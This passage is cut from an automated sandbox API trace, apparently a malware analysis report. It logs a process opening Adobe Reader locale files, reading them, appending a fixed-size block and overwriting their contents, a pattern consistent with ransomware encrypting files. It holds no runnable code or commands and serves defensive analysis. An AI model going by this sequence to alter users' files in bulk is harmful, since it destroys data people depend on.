cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DEXShare.asfx", lpUsedDefaultChar=0x0) returned 13 [0085.614] ReadFile (in: hFile=0x1e4, lpBuffer=0x25a0018, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x2fdf278*=0x4000, lpOverlapped=0x0) returned 1 [0085.616] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x8270 [0085.617] ReadFile (in: hFile=0x1e4, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0085.617] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x8270 [0085.618] WriteFile (in: hFile=0x1e4, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0085.618] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0085.618] WriteFile (in: hFile=0x1e4, lpBuffer=0x25a4048*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x25a4048*, lpNumberOfBytesWritten=0x2fdf28c*=0x4000, lpOverlapped=0x0) returned 1 [0085.619] CloseHandle (hObject=0x1e4) returned 1 [0085.619] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\uk_UA\\Annots.UKR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\uk_ua\\annots.ukr"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0085.620] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0085.620] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x7aa00 [0085.620] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0085.620] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.620] ReleaseMutex (hMutex=0x168) returned 1 [0085.620] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Annots.UKR", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0085.621] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Annots.UKR", cchWideChar=10, lpMultiByteStr=0x1f7346c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Annots.UKR", lpUsedDefaultChar=0x0) returned 10 [0085.621] ReadFile (in: hFile=0x1e4, lpBuffer=0x25a0018, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x2fdf278*=0x8000, lpOverlapped=0x0) returned 1 [0085.924] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x79a00 [0085.924] ReadFile (in: hFile=0x1e4, lpBuffer=0x2664368, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2664368*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0085.966] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x79a00 [0085.967] WriteFile (in: hFile=0x1e4, lpBuffer=0x26663c8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x26663c8*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0085.967] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0085.967] WriteFile (in: hFile=0x1e4, lpBuffer=0x286cf58*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesWritten=0x2fdf28c*=0x8000, lpOverlapped=0x0) returned 1 [0085.968] CloseHandle (hObject=0x1e4) returned 1 [0085.968] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\uk_UA\\MakeAccessible.UKR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\uk_ua\\makeaccessible.ukr"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0085.969] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0085.969] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x12400 [0085.969] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0085.969] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.970] ReleaseMutex (hMutex=0x168) returned 1 [0085.970] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MakeAccessible.UKR", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0085.970] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MakeAccessible.UKR", cchWideChar=18, lpMultiByteStr=0x1f88ba4, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MakeAccessible.UKR", lpUsedDefaultChar=0x0) returned 18 [0085.970] ReadFile (in: hFile=0x1e4, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2fdf278*=0x4000, lpOverlapped=0x0) returned 1 [0085.973] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x11400 [0085.973] ReadFile (in: hFile=0x1e4, lpBuffer=0x2664368, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2664368*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0085.974] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x11400 [0085.975] WriteFile (in: hFile=0x1e4, lpBuffer=0x2870f88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2870f88*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0085.975] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0085.975] WriteFile (in: hFile=0x1e4, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x2fdf28c*=0x4000, lpOverlapped=0x0) returned 1 [0085.975] CloseHandle (hObject=0x1e4) returned 1 [0085.976] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\uk_UA\\Search.UKR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\uk_ua\\search.ukr"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0085.976] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0085.977] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x5c00 [0085.977] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0085.977] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.977] ReleaseMutex (hMutex=0x168) returned 1 [0085.977] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Search.UKR", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0085.977] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Search.UKR", cchWideChar=10, lpMultiByteStr=0x1f7352c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Search.UKR", lpUsedDefaultChar=0x0) returned 10 [0085.977] ReadFile (in: hFile=0x1e4, lpBuffer=0x2664368, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2664368*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0085.979] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x4c00 [0085.980] ReadFile (in: hFile=0x1e4, lpBuffer=0x2664368, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2664368*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0085.980] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x4c00 [0085.980] WriteFile (in: hFile=0x1e4, lpBuffer=0x26663c8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x26663c8*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0085.981] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0085.981] WriteFile (in: hFile=0x1e4, lpBuffer=0x2664368*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2664368*, lpNumberOfBytesWritten=0x2fdf28c*=0x1000, lpOverlapped=0x0) returned 1 [0085.981] CloseHandle (hObject=0x1e4) returned 1 [0085.982] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\Acroform.CHS" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\zh_cn\\acroform.chs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0085.982] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0085.982] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x3cc00 [0085.983] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0085.983] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.983] ReleaseMutex (hMutex=0x168) returned 1 [0085.983] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Acroform.CHS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0085.983] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Acroform.CHS", cchWideChar=12, lpMultiByteStr=0x1f735ec, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Acroform.CHS", lpUsedDefaultChar=0x0) returned 12 [0085.983] ReadFile (in: hFile=0x1e4, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x2fdf278*=0x8000, lpOverlapped=0x0) returned 1 [0086.222] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x3bc00 [0086.222] ReadFile (in: hFile=0x1e4, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0086.230] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x3bc00 [0086.230] WriteFile (in: hFile=0x1e4, lpBuffer=0x2665398*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2665398*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0086.231] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0086.231] WriteFile (in: hFile=0x1e4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x2fdf28c*=0x8000, lpOverlapped=0x0) returned 1 [0086.232] CloseHandle (hObject=0x1e4) returned 1 [0086.250] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\EScript.CHS" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\zh_cn\\escript.chs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0086.251] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0086.251] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x7400 [0086.252] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0086.252] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0086.252] ReleaseMutex (hMutex=0x168) returned 1 [0086.252] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EScript.CHS", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0086.252] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EScript.CHS", cchWideChar=11, lpMultiByteStr=0x1f735ac, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EScript.CHS", lpUsedDefaultChar=0x0) returned 11 [0086.252] ReadFile (in: hFile=0x1e4, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0086.830] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x6400 [0086.831] ReadFile (in: hFile=0x1e4, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0086.853] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x6400 [0086.853] WriteFile (in: hFile=0x1e4, lpBuffer=0x2691bb8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0086.854] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0086.854] WriteFile (in: hFile=0x1e4, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x2fdf28c*=0x1000, lpOverlapped=0x0) returned 1 [0086.854] CloseHandle (hObject=0x1e4) returned 1 [0086.854] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\reflow.CHS" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\zh_cn\\reflow.chs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0086.855] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0086.855] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x1000 [0086.855] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0086.855] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0086.855] ReleaseMutex (hMutex=0x168) returned 1 [0086.855] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="reflow.CHS", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0086.855] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="reflow.CHS", cchWideChar=10, lpMultiByteStr=0x1f733cc, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="reflow.CHS", lpUsedDefaultChar=0x0) returned 10 [0086.855] ReadFile (in: hFile=0x1e4, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2fdf2bc*=0x1000, lpOverlapped=0x0) returned 1 [0086.857] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0086.857] WriteFile (in: hFile=0x1e4, lpBuffer=0x2691bb8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesWritten=0x2fdf2d0*=0x1588, lpOverlapped=0x0) returned 1 [0086.858] CloseHandle (hObject=0x1e4) returned 1 [0086.858] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\Weblink.CHS" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\zh_cn\\weblink.chs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0086.858] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0086.859] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x4e00 [0086.859] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0086.859] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0086.859] ReleaseMutex (hMutex=0x168) returned 1 [0086.859] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Weblink.CHS", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0086.859] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Weblink.CHS", cchWideChar=11, lpMultiByteStr=0x1f7362c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Weblink.CHS", lpUsedDefaultChar=0x0) returned 11 [0086.859] ReadFile (in: hFile=0x1e4, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0086.974] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x3e00 [0086.974] ReadFile (in: hFile=0x1e4, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0087.025] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x3e00 [0087.025] WriteFile (in: hFile=0x1e4, lpBuffer=0x2867a88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a88*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0087.025] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0087.026] WriteFile (in: hFile=0x1e4, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x2fdf28c*=0x1000, lpOverlapped=0x0) returned 1 [0087.026] CloseHandle (hObject=0x1e4) returned 1 [0087.026] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_TW\\DVA.CHT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\zh_tw\\dva.cht"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0087.026] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0087.027] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x2e00 [0087.027] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0087.027] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0087.027] ReleaseMutex (hMutex=0x168) returned 1 [0087.027] WideCharToMultiByte (in: CodePage=0xfde9, 